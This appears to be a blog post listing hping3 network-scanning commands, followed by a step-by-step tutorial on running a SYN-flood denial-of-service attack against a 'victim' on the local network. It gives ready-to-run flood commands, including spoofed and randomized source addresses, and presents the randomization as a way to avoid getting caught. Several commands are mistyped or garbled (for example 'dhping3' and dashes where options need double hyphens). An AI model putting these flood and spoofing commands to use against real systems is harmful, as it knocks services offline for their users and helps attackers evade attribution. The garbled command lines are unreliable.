Skip to main content

Network Scanning with HPING3

Network Scanning with HPING3

Hping Header










BELOW are the commands that one can use to scan any network with HPING3.
Bydefault hping3 is loaded with Kali Linux distros.



1) Command to check port no.
hping3 -S http://www.neelpathak.in -p 80 -c 2    (SYN Req, -c = count)

2) Command to check series of ports
hping3 -S 192.168.1.7 -p ++50 -c 5     (SYN req, starting with port 50 as a destination port, -c = count )
Giving the destination ports if they are open then they will reply on our ports..:P, If the flags we get are RA then the ports are closed.


3) hping3 -1 192.168.1.x –rand-dest -I eth0   (-1 == ICMP service, -I = interface, –rand-dest = Random destination )
To check which hosts have blocked ICMP, if the device replies then the ICMP is not blocked.


4)  hping3 -1 192.168.1.1 –icmp-ts -c2
(Icmp echo timestamp)


5) hping3 -1 192.168.1.1 –icmp-addr -c 2    (To know the netmask)
(Generally no replies will get, as machines are intelligent nowadays \ )


6) hping3 -8 50-56 -S 8.8.8.8     (-8 = SCAN, 50-56 = range , -S = SYN)
(Just scans TCP ports)


7) hping3 -2 192.168.1.6 -p 80 -c 1     (-2 = UDP)


8) hping3 -F -P -U 192.168.1.28 -c 3    (XMAS scan)


9) hping3 192.168.1.38 -Q -p 139 -s (Getting sequence numbers, if initial seq number is predictable then there must be some vulnerability in OS . Generally shown in older operating system)


10) dhping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 –flood (-S = SYN, -a <I.P.> = Spoofed IP address, –flood = Flooding)


11) hping3 -2 http://www.neelpathak.in -p ++44444 -T -n      (-T = traceroute, -n = don`t bother name resolution, -2 = UDP)
(Use ctrl+z to skip that hop  )


12) hping3 -S http://www.neelpathak.in -p 53 -T
(Use to find load balancing, use this and above command. If you get different IP address here at a particular hop then probably there is load balancing present)


13) hping3 -S http://www.neelpathak.in -p 80 -T –ttl 13 –tr-keep -n (–ttl 13 = setting ttl to 13, every host will forward except that of hop 13, –tr-keep = don`t bother about the ttl values, Here one must see the repeating IP address from that you can come to know that there is some sort of the packets forwarding from different devices..)


14) Specially crafted TCP packet with HPING3
hping3
hping send “ip(saddr=<Spoofed IP in network>,daddr=<Destination IP>)+tcp(sport=6783,dport=80,flags=s)”
Sending crafted packet to the destination.
The first part is the network layer part and then the second part is the transport layer.








How to use hping3 in kali Linux(Performing dos attack)



What is hping3

hping3 is a network tool able to send custom TCP/IP packets and to dis‐ play target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols.
Hping3 is extremely powerful you can do following things with hping3
  • Test firewall rules
  • Advanced port scanning
  • Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
  • Path MTU discovery
  • Transferring files between even really fascist firewall rules.
  • Traceroute-like under different protocols.
  • Firewalk-like usage.

What is dos Attack

Dos stands for denial of service. Dos attack shuts down Webservers/systems and completely makes them inaccessible to users.
Dos attack floods target network with excess with excess requests dos slows down the speed and eventually force webservers and systems to shut down.
Before performing dos you will need the ip address of your victim and remember victim should be connected to the same network as you.You can use Netdiscover tool to find ip address of the victim.
Hping3 is really easy to use so fire up your terminal and type the following command:
root@:~# hping3 -S --flood -V 192.168.43.2
hping attack -S Sets SYN tcp flag.Which mean you are sending syn packets.
--flood Sends lots of packets and ignore the response.it sends packets as fast as possible.
After few minutes when hping3 floods system with lots of packets he will be forced to quit network.
We are not done here in this way there are chances of getting caught.So we need to randomize our ip address to protect our identity.
So type the following command:
root@:~# hping3 -S -U --flood --rand-source -V 192.168.150.140
--rand-source Randomize the ip address.
That was simple and and straight .Please do share if it helped you.



for more info vist here - http://cyberpedia.in/scan-network-using-packet-assembleranalyzer-hping3-in-kali-linux/
Labels: